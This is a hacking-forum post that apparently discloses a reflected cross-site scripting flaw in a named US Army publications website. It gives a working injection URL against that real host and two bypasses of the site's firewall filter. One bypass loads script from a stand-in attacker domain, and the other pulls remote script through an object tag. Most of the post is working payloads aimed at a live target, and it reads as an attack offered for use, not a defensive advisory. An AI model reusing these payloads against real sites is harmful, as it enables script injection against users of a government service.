US Army - Reflective XSS - WAF Bypassed
#1
HTML Injection:

Code:
http://www.apd.army.mil/AdminPubs/searchtitle_number_pubs.asp?xradio=pubnum&search=%22%3E%3Cmarquee%3EXSS%20Here%3C/marquee%3E

WAF converts all lowercase inputs to uppercase, javascript (being case sensitive) therefore does not execute in the intended manner, stopping an alert from being achieved. There are a few ways of bypassing this:

Method 1 (working in IceWeasel but not firefox):

the following vector can be used to remotely include the javascript, using // in place of http:// to bypass another filter put in place:

Code:
"></title><script/src="//www.evilsite.com/1.JS"></script>

this gets arounf the case sensitivity issue, with the contents of 1.JS being <script>alert("something")</script>

Method 2 (working in multiple browsers):

Now time for an agnostic vector using the <object> tag to remotely include some javascript:

Code:
"></title><object type="text/x-scriptlet" data="http://jsfiddle.net/fb5upheq"></object>

Smile
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] XSS through Exif headers Insider 1 546 06-16-2020, 11:51 AM
Last Post: LaZr4us
  Guide to XSS (Examples included) NO-OP 3 12,376 04-29-2019, 12:44 PM
Last Post: mhiats37
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 5,754 04-24-2019, 08:47 PM
Last Post: thunder
  Exploiting Reflective XSS (Post) Insider 1 4,181 04-24-2019, 08:32 PM
Last Post: thunder